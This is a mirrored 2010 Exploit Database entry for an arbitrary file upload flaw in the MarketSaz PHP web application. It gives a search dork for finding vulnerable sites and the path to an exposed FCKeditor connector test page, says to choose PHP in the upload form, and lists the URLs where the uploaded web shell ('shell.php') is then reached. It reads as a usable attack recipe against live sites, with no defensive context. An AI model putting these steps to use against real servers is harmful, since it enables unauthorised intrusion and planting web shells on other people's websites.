MarketSaz – Arbitrary File Upload

• Exploit Database
• 11 阅读

• 作者： NetQurd
  日期： 2010-06-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13927/

• ==========================================
  MarketSaz remote file Upload Vulnerability
  ==========================================
  
  
  #Exploit Title: MarketSaz remote file uploade
  
  #Author: NetQurd (NetQurd@Live.com)
  
  #Dork : English = Powered MarketSaz
  
  
  #Software Link: http://www.marketsaz.com
  
  #Platform :linux/php
  
  #Exploit : http://target.com
  
  #http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  
  #Example site: http://server
  
  #Select the "File Upload" To use = php
  
  #http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  
  #Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
  
  #OR
  
  #http://server/shell.php
  # Spical Thanks To Net.Edit0r (Net.Edit0r@att.net)